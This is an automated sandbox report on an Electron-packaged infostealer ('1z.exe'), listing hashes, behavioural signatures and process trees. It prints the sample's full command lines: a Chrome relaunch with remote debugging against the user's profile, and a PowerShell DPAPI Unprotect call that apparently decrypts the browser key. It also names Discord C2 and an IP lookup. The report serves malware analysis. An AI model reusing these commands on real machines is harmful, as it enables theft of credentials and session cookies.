Overview
overview
8Static
static
3Iy0xqmfv6DsNdAB.exe
windows7-x64
7Iy0xqmfv6DsNdAB.exe
windows10-2004-x64
8$PLUGINSDI...ls.dll
windows7-x64
3$PLUGINSDI...ls.dll
windows10-2004-x64
3$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
31z.exe
windows7-x64
11z.exe
windows10-2004-x64
8LICENSES.c...m.html
windows7-x64
3LICENSES.c...m.html
windows10-2004-x64
3d3dcompiler_47.dll
windows10-2004-x64
1ffmpeg.dll
windows7-x64
1ffmpeg.dll
windows10-2004-x64
1libEGL.dll
windows7-x64
1libEGL.dll
windows10-2004-x64
1libGLESv2.dll
windows7-x64
1libGLESv2.dll
windows10-2004-x64
1resources/...dex.js
windows7-x64
3resources/...dex.js
windows10-2004-x64
3resources/...pi.dll
windows7-x64
1resources/...pi.dll
windows10-2004-x64
1resources/...e3.dll
windows7-x64
1resources/...e3.dll
windows10-2004-x64
1resources/...act.js
windows7-x64
3resources/...act.js
windows10-2004-x64
3resources/...ing.js
windows7-x64
3resources/...ing.js
windows10-2004-x64
3resources/...te3.js
windows7-x64
3resources/...te3.js
windows10-2004-x64
3resources/...ace.js
windows7-x64
3resources/...ace.js
windows10-2004-x64
3resources/...kup.js
windows7-x64
3Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-01-2025 21:43
Static task
static1
Behavioral task
behavioral1
Sample
Iy0xqmfv6DsNdAB.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
Iy0xqmfv6DsNdAB.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
1z.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
1z.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
LICENSES.chromium.html
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
LICENSES.chromium.html
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
d3dcompiler_47.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral12
Sample
ffmpeg.dll
Resource
win7-20240729-en
Behavioral task
behavioral13
Sample
ffmpeg.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral14
Sample
libEGL.dll
Resource
win7-20240903-en
Behavioral task
behavioral15
Sample
libEGL.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral16
Sample
libGLESv2.dll
Resource
win7-20240903-en
Behavioral task
behavioral17
Sample
libGLESv2.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral18
Sample
resources/app.asar.unpacked/node_modules/@primno/dpapi/dist/index.js
Resource
win7-20240729-en
Behavioral task
behavioral19
Sample
resources/app.asar.unpacked/node_modules/@primno/dpapi/dist/index.js
Resource
win10v2004-20241007-en
Behavioral task
behavioral20
Sample
resources/app.asar.unpacked/node_modules/@primno/dpapi/prebuilds/win32-x64/node.napi.dll
Resource
win7-20240903-en
Behavioral task
behavioral21
Sample
resources/app.asar.unpacked/node_modules/@primno/dpapi/prebuilds/win32-x64/node.napi.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral22
Sample
resources/app.asar.unpacked/node_modules/sqlite3/build/Release/node_sqlite3.dll
Resource
win7-20241023-en
Behavioral task
behavioral23
Sample
resources/app.asar.unpacked/node_modules/sqlite3/build/Release/node_sqlite3.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral24
Sample
resources/app.asar.unpacked/node_modules/sqlite3/deps/extract.js
Resource
win7-20240903-en
Behavioral task
behavioral25
Sample
resources/app.asar.unpacked/node_modules/sqlite3/deps/extract.js
Resource
win10v2004-20241007-en
Behavioral task
behavioral26
Sample
resources/app.asar.unpacked/node_modules/sqlite3/lib/sqlite3-binding.js
Resource
win7-20240903-en
Behavioral task
behavioral27
Sample
resources/app.asar.unpacked/node_modules/sqlite3/lib/sqlite3-binding.js
Resource
win10v2004-20241007-en
Behavioral task
behavioral28
Sample
resources/app.asar.unpacked/node_modules/sqlite3/lib/sqlite3.js
Resource
win7-20241010-en
Behavioral task
behavioral29
Sample
resources/app.asar.unpacked/node_modules/sqlite3/lib/sqlite3.js
Resource
win10v2004-20241007-en
Behavioral task
behavioral30
Sample
resources/app.asar.unpacked/node_modules/sqlite3/lib/trace.js
Resource
win7-20240903-en
Behavioral task
behavioral31
Sample
resources/app.asar.unpacked/node_modules/sqlite3/lib/trace.js
Resource
win10v2004-20241007-en
Behavioral task
behavioral32
Sample
resources/app.asar.unpacked/node_modules/sqlite3/src/backup.js
Resource
win7-20240903-en
General
-
Target
1z.exe
-
Size
155.8MB
-
MD5
70a34191dc95920a76e2a753e6745891
-
SHA1
3eec8a392ea7862ab98ba9cee175a83335f8a3bd
-
SHA256
6a36e2616c7a3136d1ab925b75972a526493470f1513a35575e24c68a5e592a9
-
SHA512
f06f81d31d15a3c3a7cbc9b50a3888e3c3465926bd6935c996c4367fc137a529ac1748fca04be22f3f2f76de1c5b1fa2cb5053c8ed1adca6af2f6a7e348c171d
-
SSDEEP
1572864:QVU4t/Ct6JMgabao+nh+bw4FlWMZBZHuoM2t52kOUeEbaVO7GJbdHDexdypGT+LY:GYUJkH0sEQ
Malware Config
Signatures
-
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3680 chrome.exe 2548 chrome.exe 4980 chrome.exe 4756 chrome.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation 1z.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 34 discord.com 43 discord.com 33 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 27 api.ipify.org 28 api.ipify.org -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
pid Process 3268 cmd.exe 2440 cmd.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 3812 tasklist.exe -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe -
pid Process 4532 powershell.exe 3988 powershell.exe 32 powershell.exe 1112 powershell.exe 4436 powershell.exe 5072 powershell.exe 2012 powershell.exe 924 powershell.exe 540 powershell.exe 2700 powershell.exe 1428 powershell.exe -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 1z.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 1z.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz 1z.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString 1z.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 1z.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 1z.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz 1z.exe -
Kills process with taskkill 4 IoCs
pid Process 4000 taskkill.exe 116 taskkill.exe 1444 taskkill.exe 4204 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 38 IoCs
pid Process 2012 powershell.exe 3988 powershell.exe 2012 powershell.exe 4532 powershell.exe 3988 powershell.exe 4532 powershell.exe 5072 powershell.exe 32 powershell.exe 32 powershell.exe 540 powershell.exe 540 powershell.exe 2700 powershell.exe 5072 powershell.exe 5072 powershell.exe 2700 powershell.exe 924 powershell.exe 1428 powershell.exe 1428 powershell.exe 924 powershell.exe 1112 powershell.exe 1112 powershell.exe 32 powershell.exe 1428 powershell.exe 1112 powershell.exe 540 powershell.exe 2700 powershell.exe 924 powershell.exe 3568 powershell.exe 3568 powershell.exe 3568 powershell.exe 1532 powershell.exe 1532 powershell.exe 1532 powershell.exe 4436 powershell.exe 4436 powershell.exe 4436 powershell.exe 2552 1z.exe 2552 1z.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 116 taskkill.exe Token: SeDebugPrivilege 3812 tasklist.exe Token: SeDebugPrivilege 1444 taskkill.exe Token: SeDebugPrivilege 2012 powershell.exe Token: SeDebugPrivilege 3988 powershell.exe Token: SeShutdownPrivilege 3928 1z.exe Token: SeCreatePagefilePrivilege 3928 1z.exe Token: SeDebugPrivilege 4532 powershell.exe Token: SeIncreaseQuotaPrivilege 4532 powershell.exe Token: SeSecurityPrivilege 4532 powershell.exe Token: SeTakeOwnershipPrivilege 4532 powershell.exe Token: SeLoadDriverPrivilege 4532 powershell.exe Token: SeSystemProfilePrivilege 4532 powershell.exe Token: SeSystemtimePrivilege 4532 powershell.exe Token: SeProfSingleProcessPrivilege 4532 powershell.exe Token: SeIncBasePriorityPrivilege 4532 powershell.exe Token: SeCreatePagefilePrivilege 4532 powershell.exe Token: SeBackupPrivilege 4532 powershell.exe Token: SeRestorePrivilege 4532 powershell.exe Token: SeShutdownPrivilege 4532 powershell.exe Token: SeDebugPrivilege 4532 powershell.exe Token: SeSystemEnvironmentPrivilege 4532 powershell.exe Token: SeRemoteShutdownPrivilege 4532 powershell.exe Token: SeUndockPrivilege 4532 powershell.exe Token: SeManageVolumePrivilege 4532 powershell.exe Token: 33 4532 powershell.exe Token: 34 4532 powershell.exe Token: 35 4532 powershell.exe Token: 36 4532 powershell.exe Token: SeIncreaseQuotaPrivilege 3988 powershell.exe Token: SeSecurityPrivilege 3988 powershell.exe Token: SeTakeOwnershipPrivilege 3988 powershell.exe Token: SeLoadDriverPrivilege 3988 powershell.exe Token: SeSystemProfilePrivilege 3988 powershell.exe Token: SeSystemtimePrivilege 3988 powershell.exe Token: SeProfSingleProcessPrivilege 3988 powershell.exe Token: SeIncBasePriorityPrivilege 3988 powershell.exe Token: SeCreatePagefilePrivilege 3988 powershell.exe Token: SeBackupPrivilege 3988 powershell.exe Token: SeRestorePrivilege 3988 powershell.exe Token: SeShutdownPrivilege 3988 powershell.exe Token: SeDebugPrivilege 3988 powershell.exe Token: SeSystemEnvironmentPrivilege 3988 powershell.exe Token: SeRemoteShutdownPrivilege 3988 powershell.exe Token: SeUndockPrivilege 3988 powershell.exe Token: SeManageVolumePrivilege 3988 powershell.exe Token: 33 3988 powershell.exe Token: 34 3988 powershell.exe Token: 35 3988 powershell.exe Token: 36 3988 powershell.exe Token: SeShutdownPrivilege 3928 1z.exe Token: SeCreatePagefilePrivilege 3928 1z.exe Token: SeDebugPrivilege 5072 powershell.exe Token: SeDebugPrivilege 32 powershell.exe Token: SeDebugPrivilege 540 powershell.exe Token: SeDebugPrivilege 2700 powershell.exe Token: SeDebugPrivilege 924 powershell.exe Token: SeDebugPrivilege 1428 powershell.exe Token: SeDebugPrivilege 1112 powershell.exe Token: SeDebugPrivilege 4204 taskkill.exe Token: SeShutdownPrivilege 3928 1z.exe Token: SeCreatePagefilePrivilege 3928 1z.exe Token: SeShutdownPrivilege 3928 1z.exe Token: SeCreatePagefilePrivilege 3928 1z.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3928 wrote to memory of 4656 3928 1z.exe 83 PID 3928 wrote to memory of 4656 3928 1z.exe 83 PID 4656 wrote to memory of 4528 4656 cmd.exe 85 PID 4656 wrote to memory of 4528 4656 cmd.exe 85 PID 3928 wrote to memory of 4116 3928 1z.exe 86 PID 3928 wrote to memory of 4116 3928 1z.exe 86 PID 4116 wrote to memory of 116 4116 cmd.exe 88 PID 4116 wrote to memory of 116 4116 cmd.exe 88 PID 3928 wrote to memory of 3680 3928 1z.exe 90 PID 3928 wrote to memory of 3680 3928 1z.exe 90 PID 3928 wrote to memory of 1060 3928 1z.exe 91 PID 3928 wrote to memory of 1060 3928 1z.exe 91 PID 3680 wrote to memory of 4000 3680 chrome.exe 93 PID 3680 wrote to memory of 4000 3680 chrome.exe 93 PID 1060 wrote to memory of 3812 1060 cmd.exe 94 PID 1060 wrote to memory of 3812 1060 cmd.exe 94 PID 3928 wrote to memory of 5028 3928 1z.exe 95 PID 3928 wrote to memory of 5028 3928 1z.exe 95 PID 5028 wrote to memory of 1444 5028 cmd.exe 97 PID 5028 wrote to memory of 1444 5028 cmd.exe 97 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4860 3680 chrome.exe 98 PID 3680 wrote to memory of 4436 3680 chrome.exe 99 PID 3680 wrote to memory of 4436 3680 chrome.exe 99 PID 3680 wrote to memory of 2548 3680 chrome.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\1z.exe"C:\Users\Admin\AppData\Local\Temp\1z.exe"1⤵
- Checks computer location settings
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "chcp"2⤵
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Windows\system32\chcp.comchcp3⤵PID:4528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4116 -
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:116
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=9222 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default https://mail.google.com2⤵
- Uses browser remote debugging
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffbd406cc40,0x7ffbd406cc4c,0x7ffbd406cc583⤵PID:4000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --field-trial-handle=1444,i,3029859962721312745,2554963348885234965,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1344 /prefetch:23⤵PID:4860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1652,i,3029859962721312745,2554963348885234965,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1648 /prefetch:33⤵PID:4436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --remote-debugging-port=9222 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --field-trial-handle=1800,i,3029859962721312745,2554963348885234965,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1792 /prefetch:13⤵
- Uses browser remote debugging
- Drops file in Program Files directory
PID:2548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"2⤵
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\system32\taskkill.exetaskkill /IM chrome.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"2⤵PID:3168
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4532
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3988
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
C:\Users\Admin\AppData\Local\Temp\1z.exe"C:\Users\Admin\AppData\Local\Temp\1z.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\build" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1912 --field-trial-handle=1916,i,7999514101395945735,15212565167325839677,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:22⤵PID:3828
-
-
C:\Users\Admin\AppData\Local\Temp\1z.exe"C:\Users\Admin\AppData\Local\Temp\1z.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\build" --mojo-platform-channel-handle=2136 --field-trial-handle=1916,i,7999514101395945735,15212565167325839677,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:82⤵PID:760
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""2⤵PID:220
-
C:\Windows\system32\findstr.exefindstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"3⤵PID:2500
-
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:32
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5072
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1112
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:540
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"2⤵PID:2716
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4204
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default https://mail.google.com2⤵
- Uses browser remote debugging
PID:4980 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffbb95acc40,0x7ffbb95acc4c,0x7ffbb95acc583⤵PID:2420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --field-trial-handle=1404,i,13542773910454693642,4300950654852705441,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1396 /prefetch:23⤵PID:5112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1920,i,13542773910454693642,4300950654852705441,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1912 /prefetch:33⤵PID:1196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --remote-debugging-port=9223 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --field-trial-handle=1984,i,13542773910454693642,4300950654852705441,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1980 /prefetch:13⤵
- Uses browser remote debugging
- Drops file in Program Files directory
PID:4756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,164,61,33,122,12,185,122,77,183,105,249,118,216,100,46,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,122,173,23,58,226,64,18,35,252,62,109,217,109,50,51,70,111,155,222,242,9,224,37,157,230,165,68,165,185,211,49,49,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,167,19,28,55,35,159,72,144,232,138,95,53,207,241,45,125,38,169,214,195,58,208,191,244,96,113,176,71,7,141,190,38,48,0,0,0,117,66,159,130,233,245,228,59,130,121,106,47,234,101,128,129,29,214,246,33,124,187,113,167,162,66,114,171,21,245,192,210,106,157,167,55,233,2,167,60,61,141,32,49,90,109,101,222,64,0,0,0,144,153,26,55,173,144,182,243,129,105,154,36,244,161,139,131,140,172,123,98,175,199,251,53,161,181,16,196,110,7,180,160,85,239,33,43,244,195,4,27,254,254,42,165,198,142,157,194,60,211,81,249,249,106,146,250,202,34,9,88,135,200,7,98), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:3268 -
